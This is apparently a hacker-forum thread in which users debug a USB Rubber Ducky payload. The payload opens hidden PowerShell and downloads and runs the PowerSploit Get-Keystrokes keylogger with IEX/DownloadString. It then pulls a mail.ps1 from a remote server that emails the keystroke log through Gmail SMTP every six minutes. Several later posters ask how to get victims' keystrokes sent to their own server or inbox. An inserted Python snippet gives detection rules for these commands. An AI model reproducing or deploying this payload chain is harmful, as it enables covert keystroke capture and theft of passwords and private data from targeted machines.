PoSHMagiC0de Posted April 27, 2018 (edited)

Just guessing, but the issue might be on this line. I don't use smtpclient in PowerShell but instead use send-mailmessage. But... the issue with the smtpclient in the script may be this, and the correction that may need to happen.

    while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

    while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Edited April 27, 2018 by PoSHMagiC0de: forgot extra parenthesis.

714Lemons Posted April 28, 2018

Hey, my problem is that things like //:https are written in PowerShell like ähttpsÖ. Any ideas how to fix this?

mrskannk Posted April 30, 2018

On 4/27/2018 at 4:16 AM, PoSHMagiC0de said:

> Just guessing, but the issue might be on this line. I don't use smtpclient in PowerShell but instead use send-mailmessage. But... the issue with the smtpclient in the script may be this, and the correction that may need to happen.
>
>     while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}
>
> should be maybe???
>
>     while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}
>
> The attachment of the mailmessage object takes an attachment object.

Hey, thanks for the reply. I tried to modify the mail.ps1 with

    while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

I'm still getting the same issue: empty emails. I can't solve this problem?

PoSHMagiC0de Posted April 30, 2018

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location, wherever $env:temp points to. If you type that out in PowerShell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. If you get no key.txt or no stuff in it then the keylogger is not logging.

mrskannk Posted April 30, 2018

31 minutes ago, PoSHMagiC0de said:

> Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location, wherever $env:temp points to. If you type that out in PowerShell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. If you get no key.txt or no stuff in it then the keylogger is not logging.

Nope, I had a look in %temp% and there is no log.txt created. Tried both scripts, same issue. Getting empty mails.

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1
https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1

PoSHMagiC0de Posted April 30, 2018

Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.

    STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run PowerShell and then run each line.

    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    #For Default path.
    Get-Keystrokes
    #To place it on your desktop do and look for keylog.txt to popup.
    Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it, or closing the PowerShell window will do the same, I believe. I have to test. I do not have my test machine up to test, so going off of what I read inside all the scripts.

Might want to check your AV too. The keylogger comes from PowerSploit, which is known by the AV authors, so it might be getting blocked.
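
The point above about AV vendors knowing the PowerSploit keylogger, seen from the defender's side: an added example (not written by anyone in this thread) that matches the command patterns quoted here against PowerShell command-line and script-block log text and flags a host when several of them fire close together. The records, host names and example.invalid URLs are constructed, and the rule names are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators taken from the commands quoted in this thread; rule names are this example's own.
RULES = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),  # also shortened parameter names
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*net\.webclient\W.*downloadstring\s*\(", re.I | re.S),
    "keylogger_function": re.compile(r"\bget-keystrokes\b", re.I),
    "smtp_attachment_send": re.compile(
        r"net\.mail\.smtpclient.*attachments\.add\s*\(.*\.send\s*\(", re.I | re.S),
}

def matched_rules(text):
    """Return the names of all rules that fire on one log record's text."""
    return {name for name, rx in RULES.items() if rx.search(text)}

def correlate(events, window=timedelta(minutes=10), min_rules=2):
    """Map host -> rules, for hosts where min_rules distinct rules fire within window."""
    hits = defaultdict(list)  # host -> [(time, rule), ...]
    for when, host, text in events:
        for rule in matched_rules(text):
            hits[host].append((datetime.fromisoformat(when), rule))
    flagged = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            rules = {r for t, r in seen[i:] if t - start <= window}
            if len(rules) >= min_rules and len(rules) > len(flagged.get(host, ())):
                flagged[host] = sorted(rules)
    return flagged

# Constructed sample records (time, host, logged text); not real telemetry.
SAMPLE = [
    ("2024-01-01T10:00:00", "WS01", r"powershell -WindowStyle hidden"),
    ("2024-01-01T10:00:02", "WS01", r"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/k.ps1')"),
    ("2024-01-01T10:00:04", "WS01", r"Get-Keystrokes -LogPath $env:temp\key.txt"),
    ("2024-01-01T10:00:10", "WS01", r"$s = New-Object Net.Mail.SmtpClient('smtp.example.invalid', 587); "
                                     r"$m.Attachments.Add($a); $s.Send($m)"),
    ("2024-01-01T09:00:00", "WS02", r"Send-MailMessage -To ops@example.invalid -Subject 'backup ok'"),
    ("2024-01-01T08:00:00", "WS04", r"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    ("2024-01-01T10:30:00", "WS04", r"Get-Keystrokes"),
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE).items():
        print(host, rules)
```

WS04 shows why the time window matters: the same two indicators two and a half hours apart are not reported with the default ten-minute window.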

mrskannk Posted April 30, 2018 (edited)

19 minutes ago, PoSHMagiC0de said:

> Sorry, just the Get-Keystrokes.ps1 script. Download it locally if you have to. By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.
>
>     STRING Get-Keystrokes -LogPath $env:temp\key.txt
>
> So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log. The test should look like below: run PowerShell and then run each line.
>
>     IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
>     #For Default path.
>     Get-Keystrokes
>     #To place it on your desktop do and look for keylog.txt to popup.
>     Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
>
> It runs in a runspace so PS will return once it starts running. You can add the param -PassThru to get a copy of the runspace to look at too. With that you can stop it, or closing the PowerShell window will do the same, I believe. I have to test. I do not have my test machine up to test, so going off of what I read inside all the scripts.
>
> Might want to check your AV too. The keylogger comes from PowerSploit, which is known by the AV authors, so it might be getting blocked.

Thanks, so if I got it right the script should look like this. I'm going to try in a sec.

So if I followed you right the script should look like this:

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -WindowStyle hidden
    ENTER
    DELAY 1500
    STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
    ENTER
    DELAY 400
    STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
    ENTER
    DELAY 200
    GUI r
    DELAY 300
    STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1')
    ENTER

    $SMTPServer = 'smtp.gmail.com'
    $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
    $SMTPInfo.EnableSsl = $true
    $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password')
    $ReportEmail = New-Object System.Net.Mail.MailMessage
    $ReportEmail.From = 'xxxx@gmail.com'
    $ReportEmail.To.Add('xxxx@gmail.com')
    $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
    while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

Edited April 30, 2018 by mrskannk

PoSHMagiC0de Posted April 30, 2018

Nope, what I am doing here is helping you troubleshoot the payload, so first take the Rubber Ducky or Bash Bunny and put it in the drawer. Ignore it for now. What you are going to have to do is verify the payload works without the RD or BB. If it doesn't work without it on your test machine then it definitely will not work being launched from the device.

So, above I was trying to have you just jump on your test machine. Run PowerShell and just use the two line commands I put out. The first will download and launch the Get-Keystrokes function to memory for use. Second and third was to run Get-Keystrokes as default, which should write the key.log file to your temp folder on your machine, or use the second Get-Keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one, so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong, but at least you may get an error message if it does. If Get-Keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email.

So, ignore the RD for now until you know the scripts work. Now if it does, then try and run the payload by hand. That means playing out by hand what the payload does to see if everything works.

DimiBoy Posted June 5, 2018

Well, if you like, I made a video of another version which sends an email after the timer is passed on the keylogger with the log. I think it might actually be useful for developers (ye I might be naive): https://www.youtube.com/watch?v=iAH5ruyo2VY

Félix Thiollize Posted October 23, 2021

Hello everyone, I've been trying for days to transform this script so that it can send me the file with the results to my private server and not my email. Does anyone have any idea concerning the Ducky or PowerShell code? Thank you. Good evening.

khalilzerei999 Posted January 16, 2022

On 3/8/2017 at 6:57 AM, Speed09 said:

> I'm not good at powershell at all, but I managed to get the exfiltrate working. I simply modified the payload to run a ps script from my server that will send me the log file via email. Here is the final ducky script:
>
>     DELAY 2000
>     GUI r
>     DELAY 500
>     STRING powershell -WindowStyle hidden
>     ENTER
>     DELAY 1500
>     STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
>     ENTER
>     DELAY 400
>     STRING Get-Keystrokes -LogPath $env:temp\key.txt
>     ENTER
>     DELAY 200
>     GUI r
>     DELAY 300
>     STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1')
>     ENTER
>
> And here is the mail.ps1 content:
>
>     $SMTPServer = 'smtp.gmail.com'
>     $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
>     $SMTPInfo.EnableSsl = $true
>     $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass')
>     $ReportEmail = New-Object System.Net.Mail.MailMessage
>     $ReportEmail.From = 'youradress@gmail.com'
>     $ReportEmail.To.Add('youradress@gmail.com')
>     $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
>     while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

Hi, I'm a beginner and I use a micro pro Arduino board as a rubber ducky. What should I change from this script as personal information? Please, I need help.

dark_pyrro Posted January 16, 2022

I guess that the end of that quote is actually your question. I'd suggest that you ask the question in some forum (or whatever) that is relevant to your hardware, since you obviously aren't using a Hak5 USB Rubber Ducky.

Johnny Sky Posted May 23

Hi, I’m just confused what I put for ('http://myserver/mail.ps1'), because I tried it and I won’t get or receive any emails.

dark_pyrro Posted May 23

Something that points to where you store the mail.ps1 file on the internet (or any server location that the target might have access to).

Miller K Posted May 24

Hi, once I inject the payload keylogger, how do I receive keystrokes to my Gmail? I’ve tried putting in my email and password..?

dark_pyrro Posted May 24

Did you set up the Gmail side of it all so that you allow sending using SMTP with the specific account that is being used?

dark_pyrro Posted May 25

Did you verify manually that it's possible to successfully do the same steps as the payload does?